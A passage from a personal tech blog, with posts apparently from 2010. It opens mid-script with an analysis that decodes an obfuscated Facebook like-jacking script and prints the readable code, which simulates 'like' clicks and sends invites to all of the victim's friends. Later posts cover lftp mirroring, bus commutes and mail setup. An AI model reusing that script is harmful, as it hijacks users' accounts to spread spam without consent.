5]]},5000);

The \x?? junk looks like hexadecimal escapes, so let's run those through a tiny Python program to decode them:

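import re, sys
base = r"""{insert the code here}"""
last = 0
for obj in re.finditer(r"\\x[0-9a-fA-F][0-9a-fA-F]", base):
    # Copy the text between the previous escape and this one unchanged.
    sys.stdout.write(base[last:obj.start()])
    # Turn the two hex digits after \x into the character they encode.
    item = chr(int(base[obj.start():obj.end()].replace("\\x",""),16))
    sys.stdout.write(item)
    last = obj.end()
# Emit whatever follows the final escape.
sys.stdout.write(base[last:])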

Off comes the second layer of obfuscation:

var _0x95ea=["visibility","style","getElementById","hidden","innerHTML","value","suggest","likeme","MouseEvents","createEvent","click","initEvent","dispatchEvent","select_all","sgm_invite_form","/ajax/social_graph/invite_dialog.php","submitDialog"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

Now, if we run this through a JavaScript beautifier, we can strip off one more layer. This beautifier appears to have partially evaluated the code, kindly substituting references to the array _0x95ea with the corresponding values:

d = document;
d['getElementById'](mw)['style']['visibility'] = 'hidden';
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];
s = d['getElementById']('suggest');
m = d['getElementById']('likeme');
c = d['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
s['dispatchEvent'](c);
setTimeout(function () {
    fs['select_all']()
}, 5000);
setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function () {
    m['dispatchEvent'](c);
    d['getElementById'](ifo)['innerHTML'] = d['getElementById'](ifc)['value']
}, 5000);

I'm not going to do a complete trace, but it's pretty clear from the above that the code is telling Facebook to "like" an application, waiting five seconds, then submitting the form that sends the "like" suggestion to all of your friends. Ouch.
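
The array-substitution step that the beautifier performed is easy to reproduce by hand. Here's a small Python sketch, assuming the lookup table is a flat array of plain double-quoted strings declared with "var NAME=[...];" at the start of the script; inline_array_refs is a made-up helper, and the snippet is a shortened stand-in for the real code.

```python
import json
import re

def inline_array_refs(source, array_name):
    """Replace array_name[N] lookups with the N-th string of the array literal."""
    literal = re.search(r"var\s+%s\s*=\s*(\[.*?\]);" % re.escape(array_name), source)
    if literal is None:
        return source  # no lookup table found; leave the code alone
    # Assumes the literal is a flat list of plain double-quoted strings.
    values = json.loads(literal.group(1))
    body = source[literal.end():]
    pattern = re.compile(re.escape(array_name) + r"\[(\d+)\]")
    return pattern.sub(lambda m: json.dumps(values[int(m.group(1))]), body)

# Shortened, harmless stand-in for the decoded script.
snippet = ('var _0x95ea=["style","getElementById","hidden"];'
           'd=document;d[_0x95ea[1]](mw)[_0x95ea[0]]=_0x95ea[2];')
readable = inline_array_refs(snippet, "_0x95ea")
print(readable)
```

This only rewrites text and never evaluates the script, which is the property you want when poking at code you don't trust.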

30 March 2010

Reverse mirroring with lftp

$ lftp -u username,password -e "mirror --reverse -x .*tif --only-newer --verbose /home/me/path/somewhere ."

I'm using a hosting account that supports ftp but not rsync. Fortunately, lftp provides rsync-like capability: reverse mirroring. The above command will copy the local directory /home/me/path/somewhere to the remote directory . (wherever you land when you first log in) on, excluding files that end in "tif", only copying newer files.


17 March 2010

The Boston-New York City Commute, part II

Now that Megabus has returned to South Station, it's a viable option for my NYC-Boston commute. I tried it again last night for the first time in some years. Thoughts:


  • MB has a 1:30 a.m. departure. The only other company that runs this late is Greyhound. Unlike Greyhound, this bus arrives just as the T starts running, makes no stops (many late-night Greyhound services stop in Worcester), and doesn't involve waiting in the basement of the Port Authority Bus Terminal. (Embarking outdoors at 31st and 8th might be unpleasant in the rain, though.)
  • The double-decker coaches are great. As comfortable as Bolt Bus but with cruelty-free seats, lots of legroom, 110v outlets, and very fast WiFi.

  • The WiFi network blocks ssh (port 22). WHY? I could still ssh from my phone, but I couldn't do real work that way. Who blocks 22 in this day and age?

The Megabus website is a disaster on mobile phones. I tried to buy a ticket from a Droid. I was redirected to the "mobile" website, which contained nothing but a warning that the mobile website wasn't ready yet and a link to the regular website. That's fine; the Android browser can handle anything. I clicked the regular-website link and navigated to the "select a bus" screen, but every time I clicked a departure time, I was immediately redirected back to the useless "mobile" website. I suspect the "don't send me to the mobile site" flag was a request parameter rather than a cookie, and someone forgot to add it to whatever request was silently triggered when I clicked a departure time.

I tried calling the booking number. Fortunately, they had someone on duty, fortunately, she even could pass me to a customer service agent. Unfortunately, the customer service agent couldn't help me. (Understandably -- this was 11pm.) [I could have booked the ticket over the phone, but paying the service fee when I had a perfectly working browser seemed silly.]

Eventually, I found steel, an alternative browser interface for Android. Steel lets you spoof your User-Agent header and pretend to be a desktop computer. Went back to the site -- huzzah! No more mobile-site redirects.
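The same trick works outside a phone browser. Here is a minimal sketch in Python, assuming the site picks the mobile redirect by inspecting the User-Agent header (which is only a guess). The URL and the User-Agent string are placeholders, and the request is built but never sent.

```python
from urllib.request import Request

# Placeholder desktop-style User-Agent string; any desktop browser's would do.
DESKTOP_UA = "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/3.6"

def desktop_request(url):
    """Build (but do not send) a request that claims to come from a desktop browser."""
    return Request(url, headers={"User-Agent": DESKTOP_UA})

req = desktop_request("http://example.com/")  # hypothetical URL

# urllib stores header names capitalized as "User-agent".
print(req.get_header("User-agent"))
```

Passing req to urllib.request.urlopen would actually fetch the page with the spoofed header.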


Great departure-time selection, nice amenities, inexplicably restricted network, dreadful mobile-phone user experience. And very fast. We left at 1:30 and arrived at 5:16. The T came at 5:30, so I was back before sunrise.

08 March 2010

The Boston-New York City Commute

An old college buddy asked on Facebook:

Going up to Boston from NYC: Megabus, Bolt Bus, or rickety Chinatown bus? What say you, oh Facebook friends?

I've made this commute about two or three times a month, more or less every month since Sept. 2007, so I had a few comments.

(All buses stop at South Station in Boston, unless otherwise noted.)

Bolt Bus is the best all-around option. The Prevost X3-45 coaches have lots of legroom, nice seats (some even have seatbelts), WiFi, and power outlets. A ticket on a less-than-full bus is $15.50 with all fees included. As a given bus sells out, the price gets closer to $20. BB leaves from 34th and 8th, right by Penn Station. Disadvantages: BB sells out quickly on Fridays. You can often buy a seat as a standby for $20 in cash, but even this is tricky at peak hours on Fridays -- there are lots of other standby passengers. The midtown departure can be slow on Monday mornings -- sometimes, the driver will go through NJ to avoid driving north through Manhattan. (Today, I left at 7:30 and arrived around 12:07.) Get an account: you get a free ride after every eight tickets, and you're automatically placed in the first boarding group when you sign in, so you get first pick of the seats.

I haven't taken Megabus since they moved to Back Bay station, but I understand they've switched back to South Station as of March 1, 2010. They now operate double-decker coaches which I haven't taken. Their single-decker coaches had WiFi (which sometimes worked), but no power outlets. Their NYC stop was also right by Penn Station. Update: they're back at South Station. Impressions here.

Fung Wah Bus and Lucky Star Bus are "Chinatown" bus lines, so named because their NYC stops are in Chinatown. FW and LS rarely sell out and have gate agents at both ends of the route, so you can buy tickets minutes before departure. Tickets are $15, except for a $25 2:30 a.m. departure. LS advertises WiFi, but I've never managed to get it to work. (My Debian setup may be a complicating factor; for some reason, LS uses encrypted WiFi.) LS has a slightly shorter route from the Williamsburg Bridge to the stop in NYC; otherwise, the two are very similar. The NYC stops are a short walk from the B/D and a longer walk up Canal St. from the 6. The seat pitch on the FW/LS buses is much smaller than on the Bolt Bus, so it's harder to work with a laptop.

Chinatown buses have a reputation for cutting corners on maintenance, safety, and driver training; I've heard horror stories. On the plus side, they tend to be a bit faster than the other lines, and I've also heard that they've cleaned up their act. I haven't had a problem, yet.

Greyhound also runs the Prevost X3-45 on the Boston-New York route, so passengers have WiFi and outlets. Greyhound's prices are slightly higher (especially if you don't buy tickets from their website). Their Manhattan destination is the Port Authority Bus Terminal, which is very grim. On the plus side, they're the only operator with buses from Manhattan in the wee hours of the morning. Make sure you pick a route with no stops (or at most one stop); you certainly do not want the eight-hour multi-stop tour of Connecticut.

General observations:

If you're lucky, the driver won't waste 10-20 minutes stopping at a rest area. Very late and very early buses are less likely to stop. Keep in mind that all buses have bathrooms, so the stop is primarily for people who can't go for four hours without eating.

Leaving at unpopular hours makes the trip much more pleasant. Not only will you avoid traffic, but you're more likely to have an empty seat next to you. (This is particularly important on the Chinatown buses, where the seats are tiny.)

Bus WiFi can be unreliable; a tethering card or a smartphone with tethering capability lets you skip the "will the WiFi work?" lottery. I've had good connectivity through Verizon Wireless for the whole route.

South Station has a parking deck on the roof; the first 15 minutes are free. If you're really cheap, you could idle outside the gate until whomever you're picking up gets there...

LimoLiner. Premium bus service. I've seen advertisements in South Station but never tried them.

Non-bus options:

Amtrak. Amtrak has two services: the Northeast Regional (about 4 to 4.5 hours) and the Acela Express (about 3.5 hours). Prices start at about $50 for the Regional and about $90 for the Acela; prices rise considerably as the trains sell out. I used to take the Regional frequently; I've never taken the Acela. The primary advantages are nicer seats, a quieter ride, outlets, and tray tables. The train also has a snack bar. Acela, I've heard, has finally begun to roll out WiFi.

The only major reason to take the Regional is to avoid traffic; otherwise, the Bolt Bus makes the exact same trip in about the same amount of time at off-peak hours. BB has smaller seats and no tray tables, but it has WiFi and more frequent departures. An off-peak Chinatown bus is often faster than the Regional. If you're heading to the northern Bronx, you can shave a fair bit of time off your trip by getting off the Regional at New Rochelle (note that only some trains stop there) and taking a taxi, instead of going all the way to Penn Station and back out again.

Flying. I haven't flown BOS-NYC, but L. has taken a few flights. Delta seems to be the cheapest for last-minute fares, based on a very small sample size. The flight is fast but the TSA delay and the difficulty of getting from New York's airports into Manhattan will slow you down. LGA has no subway stop (Robert Caro blamed this on Robert Moses); you can take the (slow) M60 bus, which meets the N/W in Queens and the 2/3 and the 4/5/6 and the A/B/C/D at 125th St. in Manhattan.

At JFK, you can take the AirTrain for $5 to the A train or to the LIRR (a CityTicket may save you a few dollars) into Penn Station. There is a flat $45 cab fare from JFK to anywhere in Manhattan.

New York Airports Service, a private shuttle, runs from LGA to Penn Station; I've taken it several times, although not lately. You can also fly to Newark, where the AirTrain will take you to NJ Transit to Penn Station. You can also take a local bus from EWR to the PATH into Manhattan. (I haven't tried this.) Wikitravel has a more detailed rundown of how to get into NYC from its airports.

Driving. Pluses: you can go door-to-door. You can take FDR Drive and skip all the lights in Manhattan. Minuses: you can't work, have to stay awake (assuming that you're driving yourself), and have to find a place to park. I've only tried this once.


Take Bolt Bus, unless you are leaving very late when BB doesn't run, are leaving at peak hours and could not get an advance ticket, or have an origin/destination in the Lower East Side and would like to avoid going through midtown. Take the Greyhound if you have to leave really late or want a nicer ride when Bolt Bus is sold out. Take the Chinatown bus if you need to make a last-minute trip. Take the Regional if you want to avoid traffic; take the Acela if you want to go a bit faster. Fly if you need to minimize travel time and don't mind the price and the 90 minutes or so when you have to be offline.

28 February 2010

Great moments in sysadminning

Folks, I finally retired my last SMTP server. I no longer run a server that accepts mail on port 25 (or port 587, or port 465) anywhere on the Internet. Forwarding my mail is now Someone Else's Responsibility.*

I had switched to Google Apps Premium for my business mail long ago, but continued to run my personal mail through an SMTP server. Comcast, for some reason, required me to use SMTP AUTH, and getting the password seemed like a major bother.

I discovered today that I do not actually have to use SMTP AUTH to connect to Comcast's SMTP server (which makes perfect sense; Comcast shouldn't have a problem determining whether mail is coming from its customers). So I switched nullmailer to point to it.

The Droid was a bit trickier. Apparently, Gmail will act as your SMTP server if you ask it nicely. Of course, I'm sure Google will keep a copy of all of your outgoing mail forever and use it to build a privacy-invading psychological profile of you, but whatever. My Droid's keyboard is too small to write anything that interesting, anyway. One problem: after I entered the settings into k9mail, k9mail was still sending mail through the old server. I shut down the old server and rebooted the phone; that seemed to fix it.

* I have high hopes, although I'm of course half-expecting to see dropped messages, long-delayed messages, weeks-long email droughts, and all of the other problems. I think the only real solution is to give up on computers altogether.

25 February 2010

signature fun

I used to wonder why smartphones inserted advertisements at the end of email messages: "Sent from my Motorola Q.", "Sent from my iPhone.", "Sent from my Verizon Wireless Blackberry.", "Sent from my Palm Pre." Then I realized that it was an apology. With it, one would look less curt when sending a short message, or less sloppy when sending a message with typos. Some correspondents even took the opportunity for humor: "Sent from a mobile device with a small, cramped keyboard." "Message by E---. Typos by iPhone."

Could one take advantage of these signatures? Perhaps, by adding "Sent from a mobile device." to _all_ of one's emails, one could avoid ever seeming curt or sloppy. One would also seem exceptionally busy (for busy people are always handling email on the road) but still dedicated (for, when one does send a long message with lots of links, the recipient will be thrilled that one took so long to tap it out on an iPhone.)


Sent from a real computer.

10 February 2010

The best part about Linux: you get to be your own sysadmin!

Some time back, Firefox started trying to open PDFs in the GNU Image Manipulation Program, which is a dreadful way to read PDFs. The only alternative was to save the PDF and open it from the command line -- clicking it in the downloads list also launched the photo editor.

This is apparently a known Debian bug: see this report. To fix it, edit /usr/share/applications/mimeinfo.cache and make sure that the line for application/pdf does not include any image editors.
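The edit can also be scripted. This is a rough sketch, assuming the cache uses the usual "mime/type=first.desktop;second.desktop;" layout and that the offending entry is called gimp.desktop (both are assumptions, so check your own file). It only transforms text; writing the result back to /usr/share/applications/mimeinfo.cache requires root.

```python
def drop_handlers(cache_text, mime_type, unwanted):
    """Remove unwanted .desktop entries from the line for one MIME type."""
    out = []
    for line in cache_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key == mime_type:
            # Keep every handler except the unwanted ones, in original order.
            kept = [h for h in value.split(";") if h and h not in unwanted]
            line = key + "=" + ";".join(kept) + ";"
        out.append(line)
    return "\n".join(out) + "\n"

# Made-up sample; a real cache lists many more MIME types.
sample = (
    "[MIME Cache]\n"
    "application/pdf=gimp.desktop;evince.desktop;\n"
    "image/png=gimp.desktop;eog.desktop;\n"
)

fixed = drop_handlers(sample, "application/pdf", {"gimp.desktop"})
print(fixed)
```

Only the application/pdf line is touched, so the image editor stays available for actual images. The cache is a generated file, so the change may be overwritten the next time it is rebuilt.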

About Me

blog at barillari dot org Older posts at